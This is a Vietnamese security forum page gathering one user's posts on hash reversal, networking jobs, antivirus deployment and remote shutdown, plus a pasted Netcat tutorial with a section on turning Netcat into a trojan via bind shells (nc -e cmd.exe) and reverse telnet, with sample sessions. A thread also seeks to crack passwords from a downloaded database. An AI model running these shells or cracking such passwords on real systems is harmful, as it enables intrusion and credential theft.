banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: hackerbeyeu  XML
Profile for hackerbeyeu Messages posted by hackerbeyeu [ number of posts not being displayed on this page: 1 ]
 

chiro8x wrote:

hackerbeyeu wrote:


Thật phí cái tên hackerbeyeu tội nghiệp mấy ông bị lấy tên. Cậu xem lại nó là BASE64. Bạn có thể giải bằng cách sau.
 


Chài , hạ nhục người khác ghê thế bạn .

Nếu đơn giản chỉ là BASE64 thì bạn giải dùm tôi đoạn code bên trên đi .

nếu chỉ dùng Base64 Decode thì nó chỉ ra được dạng giống như tương tự vầy thôi ��O���ή�

Vì trước khi encode bằng Base64 nó đã dùng thuật toán XOR hoặc AND ... để mã hoá . cái quan trọng là phải xác định được cái key của thuật toán này nếu nó dùng XOR ....

Nếu bạn cao thủ thì giúp tôi đi .

Cảm ơn cả nhà  


Vâng tôi đang hạ nhục bạn ! và nếu bạn nghĩ như thế thì tôi thực sự đang hạ nhục bạn. Cái tiêu để bài viết của bạn làm tôi đủ tư cách để hạ nhục bạn. Nếu chỉ mới tìm hiểu về XOR key và ... của bạn mà kết luận nhiều thế thì nực cười thật.

P/S: Tôi hoàn toàn không liên quan tới beyeugroup nhưng tôi thấy họ ở một tầm cao hơn bạn nhiều, mong rằng bạn đừng đánh giá bản thân quá cao. 


Chài mới 2 ngày không lại đã có người nói xấu mình nữa rồi , nói về kỹ thuật chẳng thấy đâu , toàn bàn chuyện tào lao .
Bạn nên nhớ, tôi không đánh giá bản thân mình cao , chổ nào đánh giá cao nói thử coi , tên tôi đặt chẳng liên quan gì đến Groupbeyeu gì hết , chỉ tại tôi thích tên này tôi đặt , phải chăng tại bạn quá mơ ngủ rồi tự suy diễn lung tung thôi .

Cái tiêu đề bài viết của tôi thì thế nào , sao bạn tự xưng giỏi vậy ,sao không thử giải dùm tôi đoạn hash trên đi , đây là diễn đàn kỹ thuật ,nếu không bàn luận về kỹ thuật , làm ơn để người khác bàn luận , đừng viết những điều vô bổ để rồi bài viết của tôi phải vào Recycle .

xnohat wrote:
Bồ căn cứ vào đâu để xác định hash B được sinh bằng hàm A ^ key ??? 


smilie

Cái này chỉ dựa trên sự suy đoán của mình thôi , vì không có gì để có thể xác đính được chính xác được là chuỗi mã đó đã được băm như thế nào .

Nhưng theo mình thấy đa phần để tăng tính bảo mật , nó toàn mang băm chuỗi ký tự nhập vào cùng với một Key , và dấu biệt Key này đi .do vậy cho dù mình có nắm được chuỗi Hash B cũng chẳng làm gì được nó.

Cảm ơn cả nhà

conmale wrote:
Cái network này lạ quá:

180.76.5.0/255

smilie  


Không biết anh cười có phải nó có liên quan đến vụ này không smilie

http://diendanvov.com/showthread.php?t=1656&page=1

smilie

dbntk3 wrote:
Chào các bạn!
Mình có 1 số câu hỏi sau mong mọi người hết sức giúp đỡ:
1.Làm về mạng thì làm ở những nơi đâu lương sẽ cao và làm ở vị trí gì,cơ hội thăng tiến ra sao,tính chất công việc như thế nào?
2.Ưu,khuyết điểm của những nơi đó.
3.Để làm được công việc đó cần trang bị cho mình những gì?
4.Mình nghe nói làm về mạng ở ngân hàng hay bưu chính viễn thông thì lương cao nhưng không biết thực hư thế nào và làm ở vị trí nào mà lương cao vậy,mà lương thường khoảng bao nhiêu?
5.Mình mới học xong CCNA có chứng chỉ hoàn thành CCNA của VNexperts,Tiếng anh đọc hiểu tốt,bằng đại học loại khá,định xin vào 1 vị trí làm việc với ISP trong FPT telecom.Ở đó có những vị trí nào các bạn nhỉ.Và mình nên làm ở vị trí nào để phù hợp với kiến thức hiện có.Hướng của mình là sẽ chuyên sâu về 1 mảng thôi.
Hi,hơi nhiều câu hỏi nhưng rất mong mọi người giúp đỡ mình!Mình đang cần lắm!
Mình chân thành cảm ơn.Mong mọi người đừng spam! smilie  


smilie Một câu hỏi rất thú vị và rất sát với một người mới ra trường .

Mình có một chút chia sẽ với bạn về những người đi trước xíu , có thể phần nào giúp bạn thấu đáo được định hướng của bạn .

- Với một người mới ra trường , cho dù bạn giỏi cở nào, thì mức lương của bạn cũng không vượt quá 1000 usd .vì những lý do sau .
+ Thiếu kinh nghiệm
+ Tuổi đời còn quá trẻ để qly có thể tin tưởng và giao trọng trách .
Và có 2 hướng để bạn lựa chọn .
1. Làm một người kỹ thuật giỏi ( IT Staft )
Với hướng lựa chọn này , bạn sẽ cực giỏi về kỹ thuật , nhưng mức lương bạn nhận được chỉ cỡ khoảng dưới 1000 usd ( tính đến thời điểm bây giờ mà tôi biết )

2.trở thành một người quản lý ( IT manager , ... super ...)
Với hướng lựa chọn này , thì không những bạn giỏi về kỹ thuật mà còn phải có tố chất và khả năng quản lý ( quản lý công việc + quản lý con người ) , còn làm thế nào để có thể quản lý được thì bạn nên hỏi ông google
Với mức chọn lựa này thì lương của bạn sẽ luôn trên mức 1000 usd và không có giới hạn .

Đó là những gì tôi biết và muốn chia sẽ cùng bạn

Thân

xnohat wrote:
Các mật khẩu bị mã hoá dạng băm (hash) đều thường được tạo ra bằng các hàm toán học một chiều. Do đó không có thứ gọi là giải mã ở đây. Cách hữu hiệu nhất hiện nay được biết đến là so sánh hash đó với một cơ sở dữ liệu dạng password->hash , chuyện này tương đương với thứ gọi là Brute force attack 


Cảm ơn câu trả lời của Xnohat

Key = "Nguyen Van Teo " cố định
Nhập vào chuỗi A
Output là chuỗi B
Vậy B = A ^ key

B mình đã có , nhưng A và Key thì không ai biết là gì , nếu như có được Key , thì chuyện tìm ra A là hoàn toàn có thể
Cái khó của mật khẩu dạng băm này là , người băm đã mang băm chuỗi ký tự nhập vào cùng vói một key đã cố định sẳn , cái quan trọng là nó mang dấu biệt key này đi , do vậy không dịch ngược được .
Mình đã mang giá trị Hash này tìm trong một số cơ sở dữ liệu dạng Pass - hash rồi nhưng không có kết quả , vì một mã chuỗi không giống ai + một key không giống ai = Hash không giống ai . hic .

Cảm ơn cả nhà .


Thật phí cái tên hackerbeyeu tội nghiệp mấy ông bị lấy tên. Cậu xem lại nó là BASE64. Bạn có thể giải bằng cách sau.
 


Chài , hạ nhục người khác ghê thế bạn .

Nếu đơn giản chỉ là BASE64 thì bạn giải dùm tôi đoạn code bên trên đi .

nếu chỉ dùng Base64 Decode thì nó chỉ ra được dạng giống như tương tự vầy thôi ��O���ή�

Vì trước khi encode bằng Base64 nó đã dùng thuật toán XOR hoặc AND ... để mã hoá . cái quan trọng là phải xác định được cái key của thuật toán này nếu nó dùng XOR ....

Nếu bạn cao thủ thì giúp tôi đi .

Cảm ơn cả nhà

Các Bác cho em hỏi .

Sau khi download database của SQL về, em có được password dưới dạng băm như sau " rRZWTTgzyjNqch7ffeShVA== " hoặc " 5XLJgKEWdMVUmUUVeNuyBw== "

Các bác cho hỏi có thể dùng phần mềm nào để dịch ngược được .

Em đã có thử MD5 rồi nhưng không ăn thua < có add cả rainbow table vào rồi >

Cảm ơn cả nhà nhiều .

daigiaIQ_Y2.1K wrote:
Trời đây chỉ là kỹ thuật lừa đảo thôi ,không có gì là mới mẽ , và đã cũ rích .
Theo tôi nó chỉ lừa được những người cả tin , dễ tin người thôi .chứ đã già như trái cà giống như bác conmale thì khó lừa lắm

hihi 



Một sai lầm lớn cho những kẻ chủ quan. Tuy social engineering xuất hiện rất sớm từ mãi thời ông cố kenvin mitnick nhưng social engineering khác các kiểu tấn công khác (DOS, SQL injection..) ở chỗ nó không bao giờ lỗi thời và ngày càng phát triển theo các phương diện khác nhau.
Tớ khẳng định là già như trái cà như anh conmale chắc cũng đôi lần "dính" chiêu này rồi. smilie 


Woa, 2 tuần không vào diễn đàn ,tưởng topic này đóng cửa rồi ai dè vẫn còn nóng hổi .

Hihi Daigia...

Hãy nhìn lại ở trên , vấn đề không phải ỏ chủ quan hay không chủ quan ,mà theo ý kiến của tôi nó chỉ là một kỹ thuật lừa đảo , chẳng dính dáng gì tới Technical hacking cả ,cho dù lừa được cũng chẳng có gì hay, người bị lừa cũng chẳng tâm phục khẩu phục.
chứ đã già như trái cà giống như bác conmale thì khó lừa lắm  

Câu này chỉ là chọc anh conmale thôi .
Chứ thực tế ai chẳng có những giây phút chủ quan , chính những giây phút này đã giúp những kẽ tấn công đạt được mục đích.
Nhưng dẫu sao mọi người liệt kê lên đây để mọi người nhìn nhận lại và cảnh giác cũng là một vấn đề hay
Thân

sasser01052004 wrote:
Trong năm trước, dạng tấn côn social engineering sẽ có mặt khá đầy đủ ở các phương diện tấn công. Năm nay ,hi vọng sẽ không ai bị lừa bằng thủ đoạn này. 


Trời đây chỉ là kỹ thuật lừa đảo thôi ,không có gì là mới mẽ , và đã cũ rích .
Theo tôi nó chỉ lừa được những người cả tin , dễ tin người thôi .chứ đã già như trái cà giống như bác conmale thì khó lừa lắm smilie

hihi

wkiamiuemth wrote:
dùng reshack rồi mà nó chả dịch ra cái j cả.có một đống icon với lại version thôi chứ chả có j, ai có kinh nghiệm trong lĩnh vực này tư vấn giúp em với được không? 


Gới bạn đây là nội dung chính của ct .


[DebuggerNonUserCode, CompilerGenerated, GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
internal class Resources
{
// Fields
private static CultureInfo resourceCulture;
private static ResourceManager resourceMan;

// Methods
internal Resources();

// Properties
internal static string AskSaveChanges { get; }
internal static string Assign { get; }
internal static string CannotApplySchedule { get; }
internal static string CannotFindResource { get; }
internal static string CannotFindTask { get; }
internal static string CannotOpenAccess { get; }
internal static string CannotOpenFile { get; }
internal static string CannotOpenFormat { get; }
internal static string CannotSaveAccess { get; }
internal static string CannotSaveFile { get; }
internal static string Close { get; }
internal static string CloseToolTip { get; }
internal static string CompletedWork { get; }
internal static string ContactInformation { get; }
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture { get; set; }
internal static string DueWork { get; }
internal static string Error { get; }
internal static string False { get; }
internal static string FileDialogFilter { get; }
internal static string FourPages { get; }
internal static string FourPagesToolTip { get; }
internal static string Friday { get; }
internal static string Function { get; }
internal static string HundredAbr { get; }
internal static Icon IconMinus { get; }
internal static Icon IconPlus { get; }
internal static string Monday { get; }
internal static string MonthAbr { get; }
internal static string MonthAbrShort { get; }
internal static string NoPrinter { get; }
internal static string NotLicensed { get; }
internal static string OnePage { get; }
internal static string OnePageToolTip { get; }
internal static string Page { get; }
internal static string PageToolTip { get; }
internal static string Print { get; }
internal static string PrintPreview { get; }
internal static string PrintToolTip { get; }
internal static string ProductName { get; }
internal static string ProjectPrintDocumentName { get; }
internal static string Quarter { get; }
internal static string QuarterAbr { get; }
internal static string QuarterAbrShort { get; }
internal static string QuarterFirst { get; }
internal static string QuarterShort { get; }
internal static string RemainingWork { get; }
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager { get; }
internal static string ResourcesName { get; }
internal static string ResourcesPrintDocumentName { get; }
internal static string ResourcesTitle { get; }
internal static string Saturday { get; }
internal static string ScheduleTitle { get; }
internal static string SixPages { get; }
internal static string SixPagesToolTip { get; }
internal static string Start { get; }
internal static string StatisticsTitle { get; }
internal static string Sunday { get; }
internal static string TasksName { get; }
internal static string TenAbr { get; }
internal static string ThreePages { get; }
internal static string ThreePagesToolTip { get; }
internal static string Thursday { get; }
internal static string True { get; }
internal static string Tuesday { get; }
internal static string TwoPages { get; }
internal static string TwoPagesToolTip { get; }
internal static string Wednesday { get; }
internal static string WeekAbr { get; }
internal static string WeekAbrShort { get; }
internal static string YearAbr { get; }
internal static string Zoom { get; }
internal static string ZoomToolTip { get; }
}


Expand Methods

 


Trong đoạn trên bạn cần code của phần nào pm mình , mình dihc tiếp cho

Thân

Lâu quá mới có thời gian quay trở lại HVA, nhớ anh D và mọi người wa trời. smilie

Theo em trong năm 2010 vẫn là những dạng tấn công cơ bản của Denied of Service.

NL: Attacker ----- >gởi dữ liệu giả mạo ---> Victim -----> không thể xử lý dữ liệu --->crash.

Vẫn dựa trên 2 dạng chính Syn Flooding Distributed Denied of Service attack .

Ngoài ra các vấn đề liên quan đến virus , spam , vẫn làm đau đầu các nhà quản trị ,trong năm rồi virus đã có những mục đích rõ ràng , không còn chỉ là đơn thuần là virus như những năm trước .

Lý do :

- Người sử dụng vô vẫn có thói quen download các phần mềm và tools tràn lan trên mạng về sử dụng và không kiểm tra kỹ lưỡng , vô tình bị dính vào mã độc .
- Ht thiếu trầm trọng những thiết bị quan trọng để cản và lọc , dẫn đến bị crash.
- Người quản trị chưa Pro và hay chủ quan dẫn đến cấu hình hệ thống chưa tốt và nhiếu khi bị tấn công mà vẫn không hay biết,chỉ đến khi thấy hậu quả mới cuống cuồng lo vá lổi và xử lý
Gởi anh một vài ý kiến của em


Cảm ơn TMD đã quan tâm .

Tại công ty mình dùng mô hình DC ,nên bắt buộc phải mua riêng một sever để cài Symantec Antivurus sever do đó nên cũng nằm trong DC .
Nhưng ngày trước thì sever cài bản 8.0 , gần đây thì mình cài lại bản vesion 10 cho sever,và cũng từ đó sever không tự động update phiên bản mới cho client,do vậy mà mình muốn cài lại vesion 10 client cho toàn bộ máy client,nhưng khó khăn là không thể cài cho từng máy được vì như vậy rất lâu và mất thời gian.do vậy mình đang tìm cách từ sever làm sao mà có thể update tự động bản vesion 10 cho toàn bộ client.

mô hình DC 700 máy thì cũng bình thường thôi ,tại công ty mình có nhiều chi nhánh trên thế giới

rất vui khi được thảo luận cùng bạn

Mong được tất cả các bạn giúp đỡ .

Hiện tại ở cty mìnnh có một trouble như sau

Sever : Windows Storage Sever 2003 R2
Trên sever cài đặt :Symantec Antivirus Vesion 10--> có License

Client : Windows 2000 và XP Cài Symantec Antivirus Vesion 8.0 -->có License

Vấn đề ở đây là,Bây giờ mình muốn update Symantec ở Client lên 10.để sever có thể tự động update cho client
Nếu phải cài lại cho 700 máy thì rất mất thời gian,trong khi các máy lại không cùng một chổ,TPHCM.Ha Noi,Nhat Ban,Trung Quoc .
Câu hỏi mình muốn hỏi ở đây là,có cách nào mà từ sever mà mình có thể update vesion 10 cho toàn bộ client khônng
Mô hình mạng ở cty mình là DC và mình có toàn quyền thao tác trên sever

Cảm ơn các bạn nhiều,và rất mong được sự giúp đỡ



Theo tôi thì nên cài lại windows thôi ,vì khi đã bị nhiễm con virus này thì cho dù bạn co diệt được nó thì windows đã bị lổi rồi


2 cổng trên chỉ dành cho Windows XP. Các hệ điều hành khác thì phải ngâm cứu 


Hi
Hệ điều hành khác ở đây là hệ điều hành nào vậy ?

hungbkhd wrote:
Máy ở cơ quan dùng mạng LAN nhưng thỉnh thoảng mấy ông cùng cơ quan hay táy máy nghịch tài liệu của mình. Mình muốn xem ông nào xâm nhập máy mình thì làm thế nào? Làm thế nào để biết máy nào đang thực hiện xâm nhập máy mình?  


smilie Hi bạn
Nếu muốn xem có máy nào kết nối tới máy mình thì dùng Netstat

Nếu không không muốn người ta táy máy thì nên tạo một Policy để lọc các cổng
Cụ thể .Tạo một Policy chặn các cổng vào của port 139 và 445 (nhớ mở cổng ra nếu bạn muốn táy máy vào máy người khác )

Thân

olavien wrote:

Ikut3 wrote:

neplao wrote:
Nó báo Access is denied bác à. 


Nó báo thế tức là ấy không có quyền tắt trên máy đấy smilie .Chỉ có quyền Admin mới dùng được cái này  


Thế em có pass admin máy đó rồi thì làm sao để shutdown nó? smilie  



Hi
Cần phải ấn định use có quyền shutdown trên máy đó
start-->run go lenh secpol.msc
Local Policies-->User Rights Assignment-->Force shutdown from a remote system
add use vào thực hiện câu lệnh ở trên vậy là xong
chúc thành công

neplao wrote:
Phòng làm việc em có 6 máy nối mạng LAN với nhau, thỉnh thoảng có một vài máy bật lên nhưng không sử dụng. Em muốn hỏi các bác làm sao để ngồi ở máy mình mà vẫn shut down được mấy máy kia, mong các bác giúp em. Máy em đang cài win server 2003 còn mấy cái kia xp cả. 


Hi
vào Command gỏ lệnh shutdown -i
sau đó gõ các tên máy cần shutdown hoặc địa chỉ IP và chọn shutdown
thân

nhatnguyenboy wrote:
Mấy ngày nay, các máy trong dịch vụ Net của em có tình trạng khá kỳ lạ. Xin các Bro giải thích và hướng dẫn cách khắc phục:

** Tình trạng:
- Router hay rớt (1 ngày trung bình 4-5 lần, trải đều trong ngày). Kiểm tra đường truyền ADSL >>> OK!
- Kiểm tra Virus dàn máy toàn bộ các máy Client + Server >>> OK!
- Kiểm tra ping trong DOS >>> OK!
- Kiểm tra các connect trong DOS của từng máy thì thấy: từng IP của máy Client kết nối liên tục đến IP Router qua nhiều port theo thứ tự tăng dần.

Hình ảnh dẫn chứng cụ thể :







** Xin hỏi: có phải dịch vụ Net của em đang bị DDOS, làm nghẽn băng thông Lan của dịch vụ, cách giải quyết nó thế nào đây ? Xin các Bro giúp đỡ ? 


Hi nhatnguyenboy!

- Router hay rớt (1 ngày trung bình 4-5 lần, trải đều trong ngày). Kiểm tra đường truyền ADSL >>> OK! 

Ruoter hay rớt mạng liên quan đến nhiều vấn đề lắm
bạn có thể kiểm tra lại router xem,hoặc kiểm tra lại đường truyền xem,rớt mạng cũng có thể do bên nhà cung cấp bị quá tải,hoặc đường truyền của bạn có vấn đề
-còn những hình ảnh bạn post lên mình thấy bình thường không có gì cả,chỉ có vậy thì chưa thể xác định được là ddos
bạn nên kiểm tra lại những điều trên
thân

nguyentrongcong wrote:
Xin chào các hack đại ca!
Em muốn hỏi làm thế nào để xác định các lỗ hổng trên các phần mềm và thay đổi cáu trúc của chúng như là nó mã nguồn mở vậy :?smilie :?smilie  


:wink: Hì !
câu hỏi như thế này mình chỉ có thể trả lời như sau
Muốn tìm được các lổ hổng trên phần mềm trước hết phải giỏi lập trình
phải biết được phần mềm đó viết bằng ngôn ngữ nào,nó chạy như thế nào cấu trúc nó ra sao?
một khi bạn thực hiện được những điều trên thì câu hỏi của bạn sẽ được giải quyết

kenshin8x wrote:

hackerbeyeu wrote:

mình khuyên bạn nên xem lại phần mềm tính tiền xem và thử tìm hiểu phần mềm Easycafe ,như vậy mình thấy khả thi hơn 

nếu dùng các phần mêm tính tiền tự động như Esycafe, CMS thì khả năng bị hack là rất cao vì các chương trình này chỉ cần nắm được phương thức hoạt động là vô hiệu hoá được rồi :lolsmilie  


:lolsmilie Hì !
Bị hack hay không là do mình thôi,đâu phải cái gì cũng hoàn thiện cả đâu,nếu nó dể bị hack wa thì ai cũng có thể hack được rồi vinagame đâu còn ý nghĩa gì nữa đâu .
một vài ý kiến

squalleon wrote:
mấy anh ơi làm ơn hướng dẫn cho em cách sử dụng netcat đi vì em có tải netcat về thử nhưng khi mở lên chỉ thấy comand line mấy anh chỉ cho em biết đâu là phần server đâu là client , cách hoạt động và các lệnh của nó
em chân thành cám ơn smilie)  


Hi squalleon !
Bạn nên đọc kỹ đoạn của bác conmale thi hiểu liền à

nếu không biết tiếng anh bạn có thể đọc đoạn này

2. Biên dịch
Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.

- hiệu chỉnh file netcat.c bằng vi: vi netcat.c
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init();
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):
#define GAPING_SECURITY_HOLE
#define TELNET
- biên dịch: make linux
- chạy thử: ./nc -h
- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ":."
PATH=/sbin:/usr/sbin:...:.

Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong.


--------------------------------------------------------------------------------

3. Các tùy chọn của Netcat
Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:

C:\>nc -h
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]


* Cú pháp:

- chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
- chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]

* Một số tùy chọn cơ bản :

-d tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar)
-e prog thi hành chương trình prog, thường dùng trong chế độ lắng nghe
-h gọi hướng dẫn
-i secs trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi
-l đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến
-L buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-n chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS
-o file ghi nhật kí vào file
-p port chỉ định cổng port
-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)
-s addr giả mạo địa chỉ IP nguồn là addr
-t không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd.
-u dùng UDP(mặc định netcat dùng TCP)
-v hiển thị chi tiết các thông tin về kết nối hiện tại. -vv sẽ hiển thị thông tin chi tiết hơn nữa.
-w secs đặt thời gian timeout cho mỗi kết nối là secs mili giây
-z chế độ zero I/O, thường được sử dụng khi scan port

Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080


--------------------------------------------------------------------------------

4. Các ví dụ:
4.1 Chộp banner của web server
Ví dụ: nc đến 172.16.84.2, cổng 80

C:\>nc 172.16.84.2 80
HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html


Để biết thông tin chi tiết về kết nối, bạn có thể dùng -v(-vv sẽ cho biết các thông tin chi tiết hơn nữa)

C:\>nc -vv 172.16.84.1 80
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: "0-cec-3899eaea"
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK


Nếu muốn ghi nhật kí, hãy dùng -o <tên_file>. Ví dụ:

nc -vv -o nhat_ki.log 172.16.84.2 80


- xem file nhat_ki.log

< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....


dấu < nghĩa là server gởi đến netcat
dấu > nghĩa là netcat gởi đến server

--------------------------------------------------------------------------------
-4.2 Quét cổng
- chạy netcat với tùy chọn -z. Để quét cổng nhanh hơn, hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500) của host 172.16.106.1

[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open


- nếu bạn cần scan các cổng UDP, dùng -u

[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
--------------------------------------------------------------------------------

4.3 Biến Netcat thành một trojan
- trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn -l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e <tên_chương_trình_cần_chạy> để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe(đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:

E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error


- trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080

C:\>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-1999 Microsoft Corp.
E:\>cd test
cd test
E:\test>dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
C:\test>exit
exit
sent 20, rcvd 450: NOTSOCK


Như bạn thấy, chúng ta đã có thể làm gì mà chẳng được với máy của nạn nhân qua shell lệnh này?! Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũng đóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thay cho -l. Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux.

E:\>nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...


- Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s <địa_chỉ_ip_của_máy_này>. Ví dụ:

netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe
...
E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163


- Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.

- Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.


--------------------------------------------------------------------------------

5. Kĩ thuật tiên tiến
5.1 Telnet nghịch chuuyển
- dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia. Ví dụ:

- trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25:

+ cửa sổ Netcat (1)

C:\>nc -nvv -l -p 80
listennng on [any] 80 ...
connect to [172.16.84.1] from <UNKNOWN> [172.16.84.2] 1055
pwd
ls -la
_


+ cửa sổ Netcat (2)

C:\>nc -nvv -l -p 25
listening on [any] 25 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056
/
total 171
drwxr-xr-x 17 root root 4096 Feb 5 16:15 .
drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..
drwxr-xr-x 2 root root 4096 Feb 5 08:55 b ( ²?n
